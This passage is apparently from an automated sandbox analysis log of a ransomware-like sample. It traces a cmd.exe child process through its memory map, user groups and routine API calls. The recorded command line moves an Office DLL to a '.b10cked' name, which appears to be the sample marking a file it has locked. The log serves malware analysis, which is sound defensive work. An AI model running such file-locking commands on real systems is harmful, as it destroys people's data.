returned 1 [0153.600] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.600] exit (_Code=0) Process: id = "255" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xe48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20757 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20758 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20759 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20760 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 20761 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20762 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20763 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20764 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20765 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 20766 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20923 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20924 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20925 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20926 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 20927 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 20928 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 20929 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20930 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20931 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20932 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20933 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20934 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20935 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20936 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20937 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 20938 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20939 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 20940 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 20941 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 20942 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 20943 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 20944 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 20945 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 20946 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 318 os_tid = 0xfe0 [0153.708] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f934 | out: lpSystemTimeAsFileTime=0x18f934*(dwLowDateTime=0x958d0220, dwHighDateTime=0x1d440a9)) [0153.708] GetCurrentProcessId () returned 0xe48 [0153.708] GetCurrentThreadId () returned 0xfe0 [0153.708] GetTickCount () returned 0x2f556 [0153.708] QueryPerformanceCounter (in: lpPerformanceCount=0x18f92c | out: lpPerformanceCount=0x18f92c*=21049729698) returned 1 [0153.709] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0153.709] __set_app_type (_Type=0x1) [0153.709] __p__fmode () returned 0x76b331f4 [0153.709] __p__commode () returned 0x76b331fc [0153.709] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0153.709] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0153.709] GetCurrentThreadId () returned 0xfe0 [0153.709] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfe0) returned 0x38 [0153.709] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0153.709] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0153.709] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.709] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0153.709] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f8c4 | out: phkResult=0x18f8c4*=0x0) returned 0x2 [0153.710] VirtualQuery (in: lpAddress=0x18f8fb, lpBuffer=0x18f894, dwLength=0x1c | out: lpBuffer=0x18f894*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.710] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f894, dwLength=0x1c | out: lpBuffer=0x18f894*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0153.710] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f894, dwLength=0x1c | out: lpBuffer=0x18f894*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0153.710] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f894, dwLength=0x1c | out: lpBuffer=0x18f894*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.710] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f894, dwLength=0x1c | out: lpBuffer=0x18f894*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0153.710] GetConsoleOutputCP () returned 0x1b5 [0153.710] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.710] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0153.710] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.710] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0153.710] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.710] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0153.710] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.710] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.710] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.710] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0153.711] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.711] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0153.711] GetEnvironmentStringsW () returned 0x280210* [0153.711] FreeEnvironmentStringsW (penv=0x280210) returned 1 [0153.711] GetEnvironmentStringsW () returned 0x280210* [0153.711] FreeEnvironmentStringsW (penv=0x280210) returned 1 [0153.711] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e834 | out: phkResult=0x18e834*=0x40) returned 0x0 [0153.711] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x0, lpData=0x18e840*=0xa0, lpcbData=0x18e838*=0x1000) returned 0x2 [0153.711] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x4, lpData=0x18e840*=0x1, lpcbData=0x18e838*=0x4) returned 0x0 [0153.711] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x0, lpData=0x18e840*=0x1, lpcbData=0x18e838*=0x1000) returned 0x2 [0153.711] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x4, lpData=0x18e840*=0x0, lpcbData=0x18e838*=0x4) returned 0x0 [0153.711] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x4, lpData=0x18e840*=0x40, lpcbData=0x18e838*=0x4) returned 0x0 [0153.711] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x4, lpData=0x18e840*=0x40, lpcbData=0x18e838*=0x4) returned 0x0 [0153.712] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x0, lpData=0x18e840*=0x40, lpcbData=0x18e838*=0x1000) returned 0x2 [0153.712] RegCloseKey (hKey=0x40) returned 0x0 [0153.712] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e834 | out: phkResult=0x18e834*=0x40) returned 0x0 [0153.712] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x0, lpData=0x18e840*=0x40, lpcbData=0x18e838*=0x1000) returned 0x2 [0153.712] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x4, lpData=0x18e840*=0x1, lpcbData=0x18e838*=0x4) returned 0x0 [0153.712] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x0, lpData=0x18e840*=0x1, lpcbData=0x18e838*=0x1000) returned 0x2 [0153.712] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x4, lpData=0x18e840*=0x0, lpcbData=0x18e838*=0x4) returned 0x0 [0153.712] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x4, lpData=0x18e840*=0x9, lpcbData=0x18e838*=0x4) returned 0x0 [0153.712] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x4, lpData=0x18e840*=0x9, lpcbData=0x18e838*=0x4) returned 0x0 [0153.712] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e83c, lpData=0x18e840, lpcbData=0x18e838*=0x1000 | out: lpType=0x18e83c*=0x0, lpData=0x18e840*=0x9, lpcbData=0x18e838*=0x1000) returned 0x2 [0153.712] RegCloseKey (hKey=0x40) returned 0x0 [0153.712] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637c [0153.712] srand (_Seed=0x5b88637c) [0153.712] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked\"" [0153.712] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MSOINTL.DLL.trx_dll.b10cked\"" [0153.712] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.712] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x281970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0153.713] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0153.713] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0153.713] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.713] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0153.713] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0153.713] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0153.713] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0153.713] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0153.713] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0153.713] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0153.713] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0153.713] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0153.713] GetEnvironmentStringsW () returned 0x282360* [0153.713] FreeEnvironmentStringsW (penv=0x282360) returned 1 [0153.713] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.713] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.713] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0153.713] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0153.713] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0153.713] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0153.713] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0153.713] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0153.713] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0153.713] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0153.714] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f600 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.714] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f600, lpFilePart=0x18f5fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f5fc*="Desktop") returned 0x18 [0153.714] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0153.714] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f37c | out: lpFindFileData=0x18f37c) returned 0x2809f0 [0153.714] FindClose (in: hFindFile=0x2809f0 | out: hFindFile=0x2809f0) returned 1 [0153.714] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f37c | out: lpFindFileData=0x18f37c) returned 0x2809f0 [0153.714] FindClose (in: hFindFile=0x2809f0 | out: hFindFile=0x2809f0) returned 1 [0153.714] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f37c | out: lpFindFileData=0x18f37c) returned 0x2809f0 [0153.714] FindClose (in: hFindFile=0x2809f0 | out: hFindFile=0x2809f0) returned 1 [0153.715] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0153.715] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0153.715] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0153.715] GetEnvironmentStringsW () returned 0x280210* [0153.715] FreeEnvironmentStringsW (penv=0x280210) returned 1 [0153.715] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.715] GetConsoleOutputCP () returned 0x1b5 [0153.716] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.716] GetUserDefaultLCID () returned 0x409 [0153.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0153.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f740, cchData=128 | out: lpLCData="0") returned 2 [0153.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f740, cchData=128 | out: lpLCData="0") returned 2 [0153.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f740, cchData=128 | out: lpLCData="1") returned 2 [0153.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0153.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0153.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0153.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0153.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0153.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0153.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0153.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0153.717] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0153.717] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0153.717] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0153.718] GetConsoleTitleW (in: lpConsoleTitle=0x270930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.718] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0153.718] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0153.718] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0153.718] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0153.719] _wcsicmp (_String1="move", _String2=")") returned 68 [0153.719] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0153.719] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0153.719] _wcsicmp (_String1="IF", _String2="move") returned -4 [0153.719] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0153.719] _wcsicmp (_String1="REM", _String2="move") returned 5 [0153.719] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0153.723] GetConsoleTitleW (in: lpConsoleTitle=0x18f438, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.723] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0153.723] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0153.723] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0153.723] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0153.723] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0153.723] _wcsicmp (_String1="move", _String2="CD") returned 10 [0153.723] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0153.723] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0153.723] _wcsicmp (_String1="move", _String2="REN") returned -5 [0153.723] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0153.724] _wcsicmp (_String1="move", _String2="SET") returned -6 [0153.724] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0153.724] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0153.724] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0153.724] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0153.724] _wcsicmp (_String1="move", _String2="MD") returned 11 [0153.724] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0153.724] _wcsicmp (_String1="move", _String2="RD") returned -5 [0153.724] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0153.724] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0153.724] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0153.724] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0153.724] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0153.724] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0153.724] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0153.724] _wcsicmp (_String1="move", _String2="VER") returned -9 [0153.724] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0153.724] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0153.724] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0153.724] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0153.724] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0153.724] _wcsicmp (_String1="move", _String2="START") returned -6 [0153.724] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0153.724] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0153.724] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0153.726] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.726] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.726] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f1f4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f1ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f1ec*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0153.726] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0153.726] _wcsnicmp (_String1="COPYCMD", 